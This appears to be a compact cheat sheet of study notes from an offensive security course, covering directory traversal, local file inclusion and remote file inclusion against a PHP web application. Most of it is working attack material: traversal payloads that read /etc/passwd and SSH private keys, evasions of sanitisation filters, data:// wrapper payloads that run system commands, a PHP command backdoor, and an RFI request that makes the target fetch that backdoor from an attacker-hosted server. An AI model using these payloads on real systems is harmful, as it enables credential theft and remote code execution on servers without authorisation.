Directory Traversal
Enumerate Users
../../../../../../../../../../../../../etc/passwd
Read SSH Private Keys
../../../../../../../../../../../../../home/offsec/.ssh/id_rsa
| Protection | Evasion |
Removal of path traversal characters: ../ | 1. Use ..../////, which becomes ../ after sanitization2. URL encode |
| Approved path | Go to the approved path, then go back |
| Append extension in the backend |
File Inclusion
Local File Inclusion (LFI)
- Identity a local file on the server where we can add source code to it (e.g. web application log file)
- Insert payload code into the local file (log poisoning)
- Exploit local file inclusion vulnerability to execute that file
Log path of Linux:
../../../../../../../../../var/log/apache2/access.log
Log path of Windows (XAMPP):
C:\xampp\apache\logs\access.log
Use of PHP Wrapper
php://filter
The php://filter wrapper makes the application to include the contents of the file only without execution.
curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
data://
The data:// wrapper makes the application to intepret the included contents as source code.
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
echo -n '<?php echo system($_GET["cmd"]);?>' | base64 curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
Remote File Inclusion (RFI)
- Host a web server on the attacker machine to serve the remote file to be inluded
- Make a request to the target web application to connect to the attacker’s server
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
python3 -m http.server 80 curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"